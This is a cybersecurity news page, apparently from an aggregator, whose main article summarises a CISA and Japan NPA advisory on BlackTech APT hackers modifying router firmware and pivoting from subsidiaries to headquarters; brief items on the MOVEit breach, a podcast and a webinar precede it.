MOVEIt breach impacts GenWorth, CalPERS as data for 3.2 million exposed
PBI Research Services (PBI) has suffered a data breach with three clients disclosing that the data for 4.75 million people was stolen in the recent MOVEit Transfer data-theft attacks. […] Read More
Smashing Security podcast #343: Four-legged girlfriends, LoveGPT, and a military intelligence failure
Dream girlfriends, AI love scams, and an alleged spy who is said to have made a series of blunders.
All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by Host Unknown’s Thom Langford. Read More
Defend Against Insider Threats: Join this Webinar on SaaS Security Posture Management
As security practices continue to evolve, one primary concern persists in the minds of security professionals—the risk of employees unintentionally or deliberately exposing vital information. Insider threats, whether originating from deliberate actions or accidental incidents, pose a significant challenge to safeguarding sensitive data.
To effectively address insider risks, organizations must Read More
The Hacker News | #1 Trusted Cybersecurity News Site
BlackTech APT Hackers Attacking Network Routers to Breach Corporate Networks
Hackers called BlackTech APT have been doing bad things since 2010. They attack places like the government, factories, technology, media, electronics, phones, and the military.
The group behind the attack employs custom-made malicious software, tools that can be used for both good and bad purposes, and cunning techniques that involve leveraging the resources that already exist within a system, like turning off data recording capabilities on routers, all in an effort to mask their activities.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Japan National Police Agency (NPA) demonstrated the capabilities of BlackTech in modifying router firmware without detection and exploiting routers’ domain-trust relationships for pivoting from international subsidiaries to headquarters in Japan and the U.S.
BlackTech actors continue to update their tools to evade detection, and they also steal code-signing certificates to make their malware appear legitimate.
Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware
BlackTech Malware Attack
The actors are known for using custom malware payloads and remote access tools (RATs) to target victims’ operating systems.
Their custom malware supports multiple operating systems, including Windows®, Linux®, and FreeBSD® operating systems.
BlackTech actors use living off-the-land TTPs to blend in with standard operating systems and network activities, allowing them to evade detection by endpoint detection and response (EDR) products.
Their current campaign targets international subsidiaries of the U.S. and Japanese companies.
Once they gain access to subsidiaries’ internal networks, they can infiltrate from subsidiaries to headquarters’ networks.
“BlackTech actors exploit trusted network relationships between an established victim and other entities to expand their access in target networks,” reads the report.
BlackTech took advantage of multiple router brands and versions, such as Cisco and other vendors.
In the case of Cisco routers, the actors hide their presence in Embedded Event Manager (EEM) policies used in Cisco IOS to automate tasks that execute upon specified events.
CISA and NPA shared mitigation steps to mitigate this BlackTech malicious activity. The Agencies strongly recommend network defenders monitor the unusual traffic, unauthorized downloads of bootloaders, firmware images, and reboots
Protect yourself from vulnerabilities using Patch Manager Plus to quickly patch over 850 third-party applications. Take advantage of the free trial to ensure 100% security.